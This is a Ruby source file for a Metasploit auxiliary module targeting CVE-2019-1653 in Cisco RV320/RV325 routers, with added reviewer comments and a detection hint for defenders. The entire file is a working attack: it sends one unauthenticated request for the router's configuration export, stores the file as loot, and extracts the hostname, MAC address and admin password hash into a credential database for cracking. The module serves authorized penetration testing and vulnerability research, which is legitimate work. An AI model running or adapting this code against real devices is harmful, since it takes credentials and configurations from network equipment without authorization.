Path: blob/master/modules/auxiliary/gather/cisco_rv320_config.rb
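##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary gather module for the Cisco RV320/RV325 configuration disclosure
# (CVE-2019-1653, referenced below). A single unauthenticated GET to
# TARGETURI is sent; a body carrying the `####sysconfig####` marker is treated
# as an exported configuration, stored as loot, and mined for host details and
# the admin password hash.
#
# NOTE(review): the 'Name' string says RV326 while the 'Description' and the
# CVE cover RV320/RV325; left as-is here because it is a user-visible string,
# but it looks like a typo worth confirming against the advisory.
#
# Detection hint for defenders: the only traffic this module produces is one
# unauthenticated HTTP(S) GET for the TARGETURI path (default
# /cgi-bin/config.exp); a 200 response to that request from an unauthenticated
# client is the signal that the device is unpatched.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Marker present in a real configuration export.
  CONFIG_MARKER = /####sysconfig####/.freeze

  # Redirect that patched firmware answers with instead of the export.
  PATCHED_MARKER = "meta http-equiv=refresh content='0; url=/default.htm'"

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
      'Description' => %q{
        A vulnerability in the web-based management interface of Cisco Small Business
        RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
        remote attacker to retrieve sensitive information. The vulnerability is due
        to improper access controls for URLs. An attacker could exploit this
        vulnerability by connecting to an affected device via HTTP or HTTPS and
        requesting specific URLs. A successful exploit could allow the attacker to
        download the router configuration or detailed diagnostic information. Cisco
        has released firmware updates that address this vulnerability.
      },
      'Author' =>
        [
          'RedTeam Pentesting GmbH <[email protected]>',
          'Aaron Soto <[email protected]>'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
      'DisclosureDate' => '2019-01-24',
      'DefaultOptions' =>
        {
          'SSL' => true
        }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
      ])
  end

  # Records the recovered credential against the target service in the
  # database.
  #
  # @param user [String] username taken from the `user` line of the config
  # @param hash [String] value of the `password` line; stored as a
  #   non-replayable hash with jtr_format 'md5' (the module does not verify
  #   the hash algorithm itself)
  # @return [Metasploit::Credential::Login] result of create_credential_login
  def report_cred(user, hash)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: 'md5',
      username: user,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Stores the configuration as loot and reports host details and the
  # password hash it contains.
  #
  # Every field is optional: a line missing from the export yields nil rather
  # than a NoMethodError on `match(...)[1]`, which is what the previous
  # version raised when a field was absent.
  #
  # @param config [String] raw body of the configuration export
  # @return [void]
  def parse_config(config)
    # Report loot to database (and store on filesystem)
    stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)
    print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")

    # Report host information to database. String#[] with a capture index
    # returns nil when the line is missing; compact drops those keys.
    hostname = config[/^HOSTNAME=(.*)/, 1]
    model = config[/^MODEL=(.*)/, 1]
    mac = config[/^LANMAC=(.*)/, 1]
    mac = mac.scan(/\w{2}/).join(':') if mac
    report_host({
      host: rhost,
      mac: mac,
      name: hostname,
      os_name: 'Cisco',
      os_flavor: model
    }.compact)

    # Report password hash to database, but only when both halves are present
    user = config[/^user (.*)/, 1]
    hash = config[/^password (.*)/, 1]
    if user && hash
      report_cred(user, hash)
    else
      print_warning('Configuration did not contain both a user and a password line; no credential reported')
    end
  end

  # Entry point: fetches TARGETURI and classifies the response.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on SSL handshake failure,
  #   empty or non-200 responses, a patched-device redirect, or any other
  #   unrecognised body
  def run
    begin
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'GET',
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
    end

    if res.nil?
      fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')
    elsif res.code != 200
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")
    end

    body = res.body.to_s
    if body.match?(CONFIG_MARKER)
      parse_config(body)
    elsif body.include?(PATCHED_MARKER)
      # Previously `else body.include? ...` discarded this test and reported
      # every non-config body as "patched"; now only the redirect does.
      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    else
      fail_with(Failure::UnexpectedReply, 'Unrecognised response body. Please validate the RHOST and TARGETURI options and try again.')
    end
  end
end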